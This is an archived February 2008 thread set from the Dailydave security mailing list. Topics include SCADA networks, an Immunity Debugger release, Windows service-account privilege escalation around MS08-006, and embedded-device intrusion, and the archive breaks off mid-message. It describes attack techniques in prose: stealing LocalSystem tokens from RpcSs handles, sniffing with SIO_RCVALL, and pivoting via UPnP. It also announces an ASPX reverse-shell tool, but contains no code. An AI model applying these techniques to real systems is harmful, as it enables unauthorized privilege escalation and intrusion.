From dave at immunityinc.com  Fri Feb  1 13:47:39 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Fri, 01 Feb 2008 13:47:39 -0500
Subject: [Dailydave] Network utility.
Message-ID: <47A3694B.4020807@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

When your utilities rely on your network, your network becomes a
utility. That's my take-away from the S4 SCADA conference.
 One of the talks was on California setting up the ability to turn off
everyone's air conditioners when they start having power problems via
a radio signal. Then it started talking about building mesh networks
between your house and your neighbor's house and eventually going back
to the utility company itself. To save money they were going to have
signing, but not encryption. Very odd stuff. Everyone loves to know
about their neighbor's thermostat, right?

Likewise, since control system networks are described as "quieter than
a mouse walking on cotton" there's an opening for anomaly based IDS to
succeed as a niche product since it's essentially failed in the wider
marketplace. If you do it right, you can hook it up with all sorts of
real world events:
   o Face Recognition: I see Bob's face which means activity from
Bob's console is normal
   o Moon phases: Large rain + moon phase = flooding gate opening is
normal
   o etc

Also, Steve Lipner doesn't read XKCD on a regular basis! I'm still
working my way through his book, so here's my question of the day for
the Microsoft SDL people.


S3+C
______________________________

How does "Secure By Default" contradict "Secure In Deployment"? :>

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHo2lIB8JNm+PA+iURAkK8AJ0UBgVegofF8aI9OV/Twipy/awFxACeNPFQ
BfoSlzvgoRO7zEctwu+Ozwk=
=Spec
-----END PGP SIGNATURE-----


From nicolas at immunitysec.com  Mon Feb  4 13:28:28 2008
From: nicolas at immunitysec.com (Nicolas Waisman)
Date: Mon, 04 Feb 2008 16:28:28 -0200
Subject: [Dailydave] Immunity Debugger v1.4 Release
Message-ID: <47A7594C.5090802@immunitysec.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Immunity is proud to announce: Immunity Debugger v1.4 "veni, vidi, pwn"

We would like to express our appreciation for the enormous amount of
contributions, feedback and requests we receive daily from the Immunity
Debugger community at http://forum.immunityinc.com.

Our TODO list seems infinite but we are getting the most requested
features out there for you guys.

New in this release: a proper process detach, a Second Pass Analysis
which will soon grow into better argument/local variable recognitions
and a new Silent Mode for batch scripts.

Last but not least, we have included a collection of new scripts
including a lot of contributions from forum regular Bob (scanpe.py,
hidedebug.py and bpxep.py) and the contest winning plugin from JMS
(Instead of a candle dinner with Kostya, he received a brand new job as
a Developer on the CANVAS team).

Thanks for using Immunity Debugger! We hope you enjoy this month's
release, Check out the Changelog below for more detailed information.

You can upgrade your current Immunity Debugger by going to Help/Update
or directly downloading the new installer from
http://debugger.immunityinc.com/register.html

Sincerely
Team Immunity
http://www.immunityinc.com

PS: Feedback, Requests, Scripts and Cool Screenshots are always
welcome at http://forum.immunityinc.com

1.40 Build 0

New Features:

- - Debugger Core:
  o Added Silent Debugging Flag [accesible via Debugging options ALT-O
or via immlib]
    http://forum.immunityinc.com/index.php?topic=157.0
  o Added Analysis Second Pass [Decoding Functions]
    http://forum.immunityinc.com/index.php?topic=163.0

- - Debugger GUI Core:
  o Now you can add headers + other useful information on every Row
    displayed at the Disasm Window. The information will be saved
    as part of dump struct.
  o Dettach option added to File Menu: Go to File -> Dettach [You need
to be attached to
    gray out Dettach]
    http://forum.immunityinc.com/index.php?topic=158.0


- - Debugger GUI:
  o Right click on disasm line -> Add Header will add headers to your line



- - Immunity Debugger API:
  o Row Headers / Adding Lines to CPU
    - Added imm.addHeader() and imm.getHeader() methods.
    - imm.addLine behaves like addHeader()
    - Added imm.removeHeader()/imm.removeLine() &&
imm.getHeader()/imm.getLine()
    - Added imm.getTraceArgs()

  o Added imm.goSilent() method.
  o Added imm.undecorateName() method: Undecorate symbol names
    http://forum.immunityinc.com/index.php?topic=159.0
  o Added imm.Dettach() method: Dettach current process from debugger
  o Added imm.prepareForNewProcess() method: Prepare Debugger core for a
fresh start
  o Updated BoB's UserDB.txt (http://peid.info/BobSoft/Downloads.html)

- - PyCommands:
  o Added namefunc.py : a simple samplescript that uses imm.addHeader to
name
    functions in module
  o Added traceargs.py: find User supplied arguments into a given function.
  o Added JMS's Mike & Boo script
  o User Contributed PyCommands:
     - BoB (http://PEiD.info/BobSoft/)
       * scanpe.py (http://forum.immunityinc.com/index.php?topic=137.0)
       * hidedebug.py (http://forum.immunityinc.com/index.php?topic=140.0)
       * bpxep.py (http://forum.immunityinc.com/index.php?topic=138.0)


Bug Fixes:

- - Fixed error when adding knowledge and changing python enviroments later.
  (__dict__ not accesible in restricted mode error)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHp1lMnx8KWzmcRsERAiEyAKCrZSUMKuHSJcfGcPKhhGklRBZ5zACffRI3
hmjX9oGxE5dhCtCQtzerTbE=
=AsG5
-----END PGP SIGNATURE-----

From dave at immunityinc.com  Tue Feb  5 15:36:31 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Wed, 06 Feb 2008 09:36:31 +1300
Subject: [Dailydave] Can't sleep, clowns will eat me.
Message-ID: <47A8C8CF.3010200@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I can't sleep. It's like 5:33 here in Tokyo and I woke up at 2 thinking 
"Why am I awake?". Luckily there is a present in the inbox!

http://code.google.com/p/pymsrpc/

Yay Cody and Aaron for their hard work on NDR!

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHqMjPtehAhL0gheoRAn1zAJ9EGBlhX5dKVUviy/D6vnoIBZ2nMwCfeuKg
n2coDMRNlKG7r3suh9ahgBI=
=ca/y
-----END PGP SIGNATURE-----


From george_ou at lanarchitect.net  Tue Feb 12 04:47:44 2008
From: george_ou at lanarchitect.net (George Ou)
Date: Tue, 12 Feb 2008 01:47:44 -0800
Subject: [Dailydave] Vista SP1 still vulnerable to speech recognition
	'analog' hole
Message-ID: <00a001c86d5c$51b5b1e0$f52115a0$@net>

Vista <http://blogs.zdnet.com/security/?p=875>  SP1 still vulnerable to
speech recognition 'analog' hole

 

 

George Ou, CISSP

ZDNet Editor at Large (CNET Networks)

http://blogs.zdnet.com/Ou

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080212/f2423642/attachment.htm 

From sqlsec at yahoo.com  Wed Feb 13 18:41:43 2008
From: sqlsec at yahoo.com (Cesar)
Date: Wed, 13 Feb 2008 15:41:43 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <933253.45848.qm@web33004.mail.mud.yahoo.com>

>From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
"A remote code execution vulnerability exists in the way that Internet Information Services handles input to ASP Web pages. An attacker could exploit the vulnerability by passing malicious input to a Web site?s ASP page. An attacker who successfully exploited this vulnerability could then perform any actions on the IIS Server with the same rights as the Worker Process Identity (WPI), which by default is configured with Network Service account privileges."

And then in Mitigating factors:

"On supported editions of Windows Server 2003, if IIS is enabled and classic ASP is used, an attacker who successfully exploited this vulnerability could only obtain Network Service account privileges by default. By default, Network Service account privileges have the same user rights as an authenticated user."


The thing is that in Windows XP and Windows 2003 the services security architecture has some weaknesses and any process running as Local Service or Network Service can execute code as Local System (there are other design problems that also allow elevation of privileges but this problem is enough for making the point), MS knows about this since they have fixed some weaknesses in Windows Vista and Windows 2008 (btw: these versions still has some problems) Because of these problems in Windows XP and Windows 2003 if you can run code from IIS, no matter what account the code is run under (the account only needs to have impersonation rights, any account used for IIS worker process can impersonate since the account must be member of the IIS_WPG group which can impersonate), it always can elevate privileges to Local System. On Windows 2008 if you can run code under Local Service or Network Service then you also can run code as Local System except in some
 specific (not common) scenarios. Based on all this I wonder why MS mentions Network Service account privileges as a mitigating factor since Network Service=Local System?


I'm sorry I can't give technical details at this moment, all details will be presented at HITB Dubai.

This post is not for promoting my presentation, this is just to let the people know the truth and that they should try to patch ASAP since ASP is still being used in thousands of sites, This is a "pre auth remote system compromise" vulnerability.

BTW: the weaknesses that I'm talking about aren't simple issues like impersonating when a user authenticates to IIS, which btw hasn't been mentioned in advisory too, ie: an adminsitrator authenticates to IIS so the worker process can impersonate it and elevate privileges. 
The weaknesses I'm talking about can be exploited all the time without special settings nor user interaction.


Thanks.

PD: And yes if you provide hosting on IIS you can have problems, if users can upload .asp or .aspx files to your IIS then is not your server anymore but I'm not saying nothing new :
"Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more"
http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true


Cesar.


      ____________________________________________________________________________________
Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs

From nruff at security-labs.org  Thu Feb 14 07:39:10 2008
From: nruff at security-labs.org (Nicolas RUFF)
Date: Thu, 14 Feb 2008 13:39:10 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <47B4366E.70802@security-labs.org>

> I'm sorry I can't give technical details at this moment, all details
> will be presented at HITB Dubai.

I remember reading:
http://www.nynaeve.net/?p=149

Which gives pretty scary details on how efficient service accounts 
isolation is.

Regards,
- Nicolas RUFF



From gsw at gentlesecurity.com  Thu Feb 14 08:26:32 2008
From: gsw at gentlesecurity.com (Andrey Kolishchak)
Date: Thu, 14 Feb 2008 14:26:32 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <1174859294.20080214142632@gentlesecurity.com>

Dear Cesar,

well, we have an advisory on this http://www.gentlesecurity.com/adv04302006.html
And also have demo that elevates IIS's NetworkService up to LocalSystem.

The exploit targets RpcSs which also runs on behalf of NetworkService
and _always_ (no special actions required) contains token handles for
LocalSystem. The tokens is result of impersonation of privileged
clients heavily using RPCs. The attack just enumerate all handles
in RpcSs process, find those with LocalSystem privileges and
impersonate a thread with that token.

The problem is that there are many other services that run on behalf
of NetworkService or LocalService accounts. And some of these services
have to impersonate privileged clients, such as RpcSs. So you just
break into one of the services and able to compromise all others.

The Microsoft's decision to run RpcSs as NetworkService is, in fact,
weakened the configuration. RpcSs run on behalf of LocalSystem would
be more secure as other NetworkService processes would not be able to
attack it.

The issue with services is partly addressed in Windows Vista where
process objects might be owned by unique service SID, symbolic: NT
Service\ServiceName. However, that is not enabled for all services by
default. Not even all services coming with Vista support unique
service SIDs.
<http://www.gentlesecurity.com/blog/andr/cracking_windows_access_control.pdf>

I guess, you mentioning the same problem and would be interested to
hear more about if that is something new.


But NetworkService is particularly dangerous, even without this
problem. NetworkService has permissions to issue SIO_RCVALL on sockets
and sniff machine's network traffic (note, no additional driver is
required).


 Andrey.

 
> From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
> "A remote code execution vulnerability exists in the way that
> Internet Information Services handles input to ASP Web pages. An
> attacker could exploit the vulnerability by passing malicious input
> to a Web site?s ASP page. An attacker who successfully exploited
> this vulnerability could then perform any actions on the IIS Server
> with the same rights as the Worker Process Identity (WPI), which by
> default is configured with Network Service account privileges."

> And then in Mitigating factors:

> "On supported editions of Windows Server 2003, if IIS is enabled
> and classic ASP is used, an attacker who successfully exploited this
> vulnerability could only obtain Network Service account privileges
> by default. By default, Network Service account privileges have the
> same user rights as an authenticated user."


> The thing is that in Windows XP and Windows 2003 the services
> security architecture has some weaknesses and any process running as
> Local Service or Network Service can execute code as Local System
> (there are other design problems that also allow elevation of
> privileges but this problem is enough for making the point), MS
> knows about this since they have fixed some weaknesses in Windows
> Vista and Windows 2008 (btw: these versions still has some problems)
> Because of these problems in Windows XP and Windows 2003 if you can
> run code from IIS, no matter what account the code is run under (the
> account only needs to have impersonation rights, any account used
> for IIS worker process can impersonate since the account must be
> member of the IIS_WPG group which can impersonate), it always can
> elevate privileges to Local System. On Windows 2008 if you can run
> code under Local Service or Network Service then you also can run
> code as Local System except in some
>  specific (not common) scenarios. Based on all this I wonder why MS
> mentions Network Service account privileges as a mitigating factor
> since Network Service=Local System?


> I'm sorry I can't give technical details at this moment, all
> details will be presented at HITB Dubai.

> This post is not for promoting my presentation, this is just to let
> the people know the truth and that they should try to patch ASAP
> since ASP is still being used in thousands of sites, This is a "pre
> auth remote system compromise" vulnerability.

> BTW: the weaknesses that I'm talking about aren't simple issues
> like impersonating when a user authenticates to IIS, which btw
> hasn't been mentioned in advisory too, ie: an adminsitrator
> authenticates to IIS so the worker process can impersonate it and elevate privileges.
> The weaknesses I'm talking about can be exploited all the time
> without special settings nor user interaction.


> Thanks.

> PD: And yes if you provide hosting on IIS you can have problems, if
> users can upload .asp or .aspx files to your IIS then is not your
> server anymore but I'm not saying nothing new :
> "Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more"
> http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true


> Cesar.


>      
> ____________________________________________________________________________________
> Never miss a thing.  Make Yahoo your home page. 
> http://www.yahoo.com/r/hs
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave


From sqlsec at yahoo.com  Thu Feb 14 08:42:44 2008
From: sqlsec at yahoo.com (Cesar)
Date: Thu, 14 Feb 2008 05:42:44 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <172399.52286.qm@web33006.mail.mud.yahoo.com>

Nice articles, they mention some problems, luckily none of them are the ones I found ;) so you can imagine how many problems are .
I didn't know about the DACL on Local Service or Network Service services processes allowing to WRITE DAC to processes running account, if that works then there you have a way to compromise another process to get a high privileged token and elevate privileges.

Cesar.

----- Original Message ----
From: Nicolas RUFF <nruff at security-labs.org>
To: dailydave at lists.immunityinc.com
Cc: Cesar <sqlsec at yahoo.com>
Sent: Thursday, February 14, 2008 9:39:10 AM
Subject: Re: [Dailydave] MS08-006 under rated?

> I'm sorry I can't give technical details at this moment, all details
> will be presented at HITB Dubai.

I remember reading:
http://www.nynaeve.net/?p=149

Which gives pretty scary details on how efficient service accounts 
isolation is.

Regards,
- Nicolas RUFF


      ____________________________________________________________________________________
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ 


From dave at immunityinc.com  Thu Feb 14 09:25:31 2008
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 14 Feb 2008 09:25:31 -0500
Subject: [Dailydave] Printers
Message-ID: <47B44F5B.6010603@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://www.eweek.com/c/a/Printers/Multifunction-Printers-The-Forgotten-Security-Risk/1/

I found this article quite interesting since Bas just finished a
penetration test where he managed to break in through a large printer
that was exposed to the Internet. There are real business reasons for
having your printers exposed and the risks are somewhat vague,
especially to most network security staff. I like seeing some of the
theoretical stuff actually happen though. :>

Sinan Eren is giving a neat talk in a few days at BlackHat Federal -
IO Immunity Style. It starts off with a case study of what happens
when someone real goes up against a hard target and isn't doing a
penetration test. After that you get to see a demo of PINK, which is
an essentially undetectable-on-the-wire remote beaconing trojan he
wrote.  Then at the end you get to ask questions of one of the finest
information security minds in the industry.

I'll be at the first day of BH Federal as well, and helping with the
defend the flag. So hopefully I'll see a lot of the people on this
list there!

- -d
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHtE9ZB8JNm+PA+iURAgjnAJ4scFakSWYK20N1II57vJEnhWIJaQCgsO6c
EhMsBLYveYQYPqp3qZIiV6s=
=gFxK
-----END PGP SIGNATURE-----


From sqlsec at yahoo.com  Thu Feb 14 09:34:36 2008
From: sqlsec at yahoo.com (Cesar)
Date: Thu, 14 Feb 2008 06:34:36 -0800 (PST)
Subject: [Dailydave] MS08-006 under rated?
Message-ID: <851421.36886.qm@web33008.mail.mud.yahoo.com>

Hi Andrey.

>well, we have an advisory on this http://www.gentlesecurity.com/adv04302006.html
>And also have demo that elevates IIS's NetworkService up to LocalSystem.

Yes I have seen your advisory long time ago, you didn't mention any technical details nor provide any code (which is OK ) so I don't know if we are talking about the same problems.

>The Microsoft's decision to run RpcSs as NetworkService is, in fact,
>weakened the configuration. RpcSs run on behalf of LocalSystem would
>be more secure as other NetworkService processes would not be able to
>attack it.

Running RpcSs as LocalSystem won't help much, still other attacks are possible.
RpcSs process is not the only one that impersonates LocalSystem.


>The issue with services is partly addressed in Windows Vista where
>process objects might be owned by unique service SID, symbolic: NT
>Service\ServiceName. However, that is not enabled for all services by
>default. Not even all services coming with Vista support unique
>service SIDs.
><http://www.gentlesecurity.com/blog/andr/cracking_windows_access_control.pdf>
>I guess, you mentioning the same problem and would be interested to
>hear more about if that is something new.

Again, you are not mentioning technical details nor providing code  (which is OK ) so I don't know if we are talking about the same problems.

>But NetworkService is particularly dangerous, even without this
>problem. NetworkService has permissions to issue SIO_RCVALL on sockets
>and sniff machine's network traffic (note, no additional driver is
>required).

This is cool, I didn't know about this, again we can see how many problems related with NetworkServer and LocalServer there are.


PS: I know i'm not providing technical details nor code I can't because I will present this stuff at a conference. Anyways this thread is bringing to light interesting stuff.

Cesar.

----- Original Message ----
From: Andrey Kolishchak <gsw at gentlesecurity.com>
To: dailydave at lists.immunityinc.com; Cesar <sqlsec at yahoo.com>
Sent: Thursday, February 14, 2008 10:26:32 AM
Subject: Re: [Dailydave] MS08-006 under rated?

Dear Cesar,

well, we have an advisory on this http://www.gentlesecurity.com/adv04302006.html
And also have demo that elevates IIS's NetworkService up to LocalSystem.

The exploit targets RpcSs which also runs on behalf of NetworkService
and _always_ (no special actions required) contains token handles for
LocalSystem. The tokens is result of impersonation of privileged
clients heavily using RPCs. The attack just enumerate all handles
in RpcSs process, find those with LocalSystem privileges and
impersonate a thread with that token.

The problem is that there are many other services that run on behalf
of NetworkService or LocalService accounts. And some of these services
have to impersonate privileged clients, such as RpcSs. So you just
break into one of the services and able to compromise all others.

The Microsoft's decision to run RpcSs as NetworkService is, in fact,
weakened the configuration. RpcSs run on behalf of LocalSystem would
be more secure as other NetworkService processes would not be able to
attack it.

The issue with services is partly addressed in Windows Vista where
process objects might be owned by unique service SID, symbolic: NT
Service\ServiceName. However, that is not enabled for all services by
default. Not even all services coming with Vista support unique
service SIDs.
<http://www.gentlesecurity.com/blog/andr/cracking_windows_access_control.pdf>

I guess, you mentioning the same problem and would be interested to
hear more about if that is something new.


But NetworkService is particularly dangerous, even without this
problem. NetworkService has permissions to issue SIO_RCVALL on sockets
and sniff machine's network traffic (note, no additional driver is
required).


Andrey.


> From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
> "A remote code execution vulnerability exists in the way that
> Internet Information Services handles input to ASP Web pages. An
> attacker could exploit the vulnerability by passing malicious input
> to a Web site?s ASP page. An attacker who successfully exploited
> this vulnerability could then perform any actions on the IIS Server
> with the same rights as the Worker Process Identity (WPI), which by
> default is configured with Network Service account privileges."

> And then in Mitigating factors:

> "On supported editions of Windows Server 2003, if IIS is enabled
> and classic ASP is used, an attacker who successfully exploited this
> vulnerability could only obtain Network Service account privileges
> by default. By default, Network Service account privileges have the
> same user rights as an authenticated user."


> The thing is that in Windows XP and Windows 2003 the services
> security architecture has some weaknesses and any process running as
> Local Service or Network Service can execute code as Local System
> (there are other design problems that also allow elevation of
> privileges but this problem is enough for making the point), MS
> knows about this since they have fixed some weaknesses in Windows
> Vista and Windows 2008 (btw: these versions still has some problems)
> Because of these problems in Windows XP and Windows 2003 if you can
> run code from IIS, no matter what account the code is run under (the
> account only needs to have impersonation rights, any account used
> for IIS worker process can impersonate since the account must be
> member of the IIS_WPG group which can impersonate), it always can
> elevate privileges to Local System. On Windows 2008 if you can run
> code under Local Service or Network Service then you also can run
> code as Local System except in some
>  specific (not common) scenarios. Based on all this I wonder why MS
> mentions Network Service account privileges as a mitigating factor
> since Network Service=Local System?


> I'm sorry I can't give technical details at this moment, all
> details will be presented at HITB Dubai.

> This post is not for promoting my presentation, this is just to let
> the people know the truth and that they should try to patch ASAP
> since ASP is still being used in thousands of sites, This is a "pre
> auth remote system compromise" vulnerability.

> BTW: the weaknesses that I'm talking about aren't simple issues
> like impersonating when a user authenticates to IIS, which btw
> hasn't been mentioned in advisory too, ie: an adminsitrator
> authenticates to IIS so the worker process can impersonate it and elevate privileges.
> The weaknesses I'm talking about can be exploited all the time
> without special settings nor user interaction.


> Thanks.

> PD: And yes if you provide hosting on IIS you can have problems, if
> users can upload .asp or .aspx files to your IIS then is not your
> server anymore but I'm not saying nothing new :
> "Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more"
> http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true


> Cesar.


>      
> ____________________________________________________________________________________
> Never miss a thing.  Make Yahoo your home page. 
> http://www.yahoo.com/r/hs
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave


      ____________________________________________________________________________________
Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ 


From dailydave at digitaloffense.net  Thu Feb 14 09:39:13 2008
From: dailydave at digitaloffense.net (H D Moore)
Date: Thu, 14 Feb 2008 08:39:13 -0600
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <933253.45848.qm@web33004.mail.mud.yahoo.com>
References: <933253.45848.qm@web33004.mail.mud.yahoo.com>
Message-ID: <200802140839.13451.dailydave@digitaloffense.net>

You can read my first round of analysis here:
https://strikecenter.bpointsys.com/

The two questions I still have:
 * Is this exploitable out of the box with iishelp/common/500-100.asp
 * Is this exploitable through Response.Redirect()

Cheers,

-HD

On Wednesday 13 February 2008, Cesar wrote:
> From http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
> "A remote code execution vulnerability exists in the way that Internet
> Information Services handles input to ASP Web pages. An attacker could
> exploit the vulnerability by passing malicious input to a Web site?s
> ASP page. An attacker who successfully exploited this vulnerability
> could then perform any actions on the IIS Server with the same rights
> as the Worker Process Identity (WPI), which by default is configured
> with Network Service account privileges."



From gsw at gentlesecurity.com  Thu Feb 14 10:49:54 2008
From: gsw at gentlesecurity.com (Andrey Kolishchak)
Date: Thu, 14 Feb 2008 16:49:54 +0100
Subject: [Dailydave] MS08-006 under rated?
In-Reply-To: <851421.36886.qm@web33008.mail.mud.yahoo.com>
References: <851421.36886.qm@web33008.mail.mud.yahoo.com>
Message-ID: <84514741.20080214164954@gentlesecurity.com>



> Yes I have seen your advisory long time ago, you didn't mention any
> technical details nor provide any code (which is OK ) so I don't

The advisory mentioning that demo is provided and it is available on
request on our web site since the moment of advisory (almost two years
for now). Given that I would say we didn't provide any code.

Now I just explained how exploit works, is it still insufficient to
judge for similarities? I'm just curious.

Thanks,
 Andrey

 

> Hi Andrey.

>>well, we have an advisory on this http://www.gentlesecurity.com/adv04302006.html
>>And also have demo that elevates IIS's NetworkService up to LocalSystem.

> Yes I have seen your advisory long time ago, you didn't mention any
> technical details nor provide any code (which is OK ) so I don't
> know if we are talking about the same problems.

>>The Microsoft's decision to run RpcSs as NetworkService is, in fact,
>>weakened the configuration. RpcSs run on behalf of LocalSystem would
>>be more secure as other NetworkService processes would not be able to
>>attack it.

> Running RpcSs as LocalSystem won't help much, still other attacks are possible.
> RpcSs process is not the only one that impersonates LocalSystem.


>>The issue with services is partly addressed in Windows Vista where
>>process objects might be owned by unique service SID, symbolic: NT
>>Service\ServiceName. However, that is not enabled for all services by
>>default. Not even all services coming with Vista support unique
>>service SIDs.
>><http://www.gentlesecurity.com/blog/andr/cracking_windows_access_control.pdf>
>>I guess, you mentioning the same problem and would be interested to
>>hear more about if that is something new.

> Again, you are not mentioning technical details nor providing code 
> (which is OK ) so I don't know if we are talking about the same problems.

>>But NetworkService is particularly dangerous, even without this
>>problem. NetworkService has permissions to issue SIO_RCVALL on sockets
>>and sniff machine's network traffic (note, no additional driver is
>>required).

> This is cool, I didn't know about this, again we can see how many
> problems related with NetworkServer and LocalServer there are.


> PS: I know i'm not providing technical details nor code I can't
> because I will present this stuff at a conference. Anyways this
> thread is bringing to light interesting stuff.

> Cesar.



From unknown.pentester at gmail.com  Thu Feb 14 11:16:47 2008
From: unknown.pentester at gmail.com (Adrian P)
Date: Thu, 14 Feb 2008 16:16:47 +0000
Subject: [Dailydave] Printers
In-Reply-To: <47B44F5B.6010603@immunityinc.com>
References: <47B44F5B.6010603@immunityinc.com>
Message-ID: <b7a807650802140816j13a196a9y9b625dad837f9f81@mail.gmail.com>

Well, to me, embedded devices are the overlooked backdoor to corporate
networks. There is not enough attention being paid to "miscellaneous"
embedded devices such as IP phones, cameras, printers, etc ...

Also let's not forget that what makes a "consumer grade" router is
becoming very blurry these days as home-type routers are being used in
SOHOs and corporate networks (ie: Linksys routers)

What's exciting to me is not only the fact that many of these devices
can be broken into so easily, but also what can be done _after_
compromising them: stepping stone attacks. In other words: you might
have web/app server properly segmented but what about all those random
"not big deal" embedded devices exposed to the Internet but located in
the LAN of the corporate network? Most people say: "well, you can
break into my printer, what a big deal". Well, maybe being able to
stop printjobs is not a big deal, but perhaps you can enable port
forwarding via the web console of UPnP in order to probe internal
systems - then things do get interesting. The possibilities are
endless!

After researching embedded devices for a while I've realized that the
web interfaces and insecure built-in protocols such as UPnP
(authentication-less) are the low hanging fruit for attacking such
systems. I mean, you find web security bugs that reminds you of things
people would find in the early 90s.

Anyway, for those interested in this topic I will be giving my
"Cracking into Embedded Devices and Beyond!" presentation which will
demo Hollywood-style camera hacks (replacing video stream with
infinite loop), and wardriving over the Internet via owned embedded
devices: http://conference.hackinthebox.org/hitbsecconf2008dubai/?page_id=186

Regards,
AP.

On Thu, Feb 14, 2008 at 2:25 PM, Dave Aitel <dave at immunityinc.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
>  Hash: SHA1
>
>  http://www.eweek.com/c/a/Printers/Multifunction-Printers-The-Forgotten-Security-Risk/1/
>
>  I found this article quite interesting since Bas just finished a
>  penetration test where he managed to break in through a large printer
>  that was exposed to the Internet. There are real business reasons for
>  having your printers exposed and the risks are somewhat vague,
>  especially to most network security staff. I like seeing some of the
>  theoretical stuff actually happen though. :>
>
>  Sinan Eren is giving a neat talk in a few days at BlackHat Federal -
>  IO Immunity Style. It starts off with a case study of what happens
>  when someone real goes up against a hard target and isn't doing a
>  penetration test. After that you get to see a demo of PINK, which is
>  an essentially undetectable-on-the-wire remote beaconing trojan he
>  wrote.  Then at the end you get to ask questions of one of the finest
>  information security minds in the industry.
>
>  I'll be at the first day of BH Federal as well, and helping with the
>  defend the flag. So hopefully I'll see a lot of the people on this
>  list there!
>
>  - -d
>  -----BEGIN PGP SIGNATURE-----
>  Version: GnuPG v1.4.6 (GNU/Linux)
>
>  iD8DBQFHtE9ZB8JNm+PA+iURAgjnAJ4scFakSWYK20N1II57vJEnhWIJaQCgsO6c
>  EhMsBLYveYQYPqp3qZIiV6s=
>  =gFxK
>  -----END PGP SIGNATURE-----
>
>  _______________________________________________
>  Dailydave mailing list
>  Dailydave at lists.immunitysec.com
>  http://lists.immunitysec.com/mailman/listinfo/dailydave
>



-- 
pagvac
gnucitizen.org

From brett.moore at insomniasec.com  Thu Feb 14 14:04:39 2008
From: brett.moore at insomniasec.com (Brett Moore)
Date: Fri, 15 Feb 2008 08:04:39 +1300
Subject: [Dailydave] Insomnia: Tool Release - InsomniaShell.aspx
Message-ID: <000001c86f3c$744ea090$5cebe1b0$@moore@insomniasec.com>

___________________________________________________________________

 Insomnia Security :: InsomniaShell.aspx
___________________________________________________________________

 Name: InsomniaShell.aspx
 Released: 12 Feb 2008
 Author: Brett Moore, Insomnia Security
 Original Link: http://www.insomniasec.com/releases/tools
___________________________________________________________________

InsomniaShell is a tool for use during penetration tests, when
you have ability to upload or create an arbitrary .aspx page.

This .aspx page is an example of using native calls through pinvoke
to provide either a reverse shell or a bind shell. 

It has the added advantage of searching through all accessible 
processes looking for a SYSTEM or Administrator token to use for
impersonation.

If the provider page is running on a server with a local SQL Server
instance, the shell includes functionality for a named pipe 
impersonation attack. This requires knowledge of the sa password,
and results in the theft of the token that the SQL server is 
executing under.
___________________________________________________________________


From jdangler at terremark.com  Thu Feb 14 16:49:47 2008
From: jdangler at terremark.com (John Dangler)
Date: Thu, 14 Feb 2008 16:49:47 -0500
Subject: [Dailydave] Embedded devices
Message-ID: <5BA9127B88DFD347AE9A8F1C05A6E08BFB68F9@exchange04.terremark.org>

While somewhat new to all of this, it seems to remind me of a book I read long ago - The Cuckoo's Egg. And a more recent one - The art of Intrusion.  Basically, nothing should be overlooked or left to chance.

Jack - BB
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080214/c4b9506f/attachment.htm 

From dan at geer.org  Thu Feb 14 19:57:04 2008
From: dan at geer.org (dan at geer.org)
Date: Thu, 14 Feb 2008 19:57:04 -0500
Subject: [Dailydave] Printers
In-Reply-To: Your message of "Thu, 14 Feb 2008 16:16:47 GMT."
	<b7a807650802140816j13a196a9y9b625dad837f9f81@mail.gmail.com> 
Message-ID: <20080215005704.F1B4233DD1@absinthe.tinho.net>


"Adrian P" writes:
-+----------------
 | Well, to me, embedded devices are the overlooked backdoor to
 | corporate networks. There is not enough attention being paid
 | to "miscellaneous" embedded devices such as IP phones, cameras,
 | printers, etc ... 


As far as I can tell, the general purpose computer is dead;
it just doesn't know it yet.  Nearly all the NYC banks of
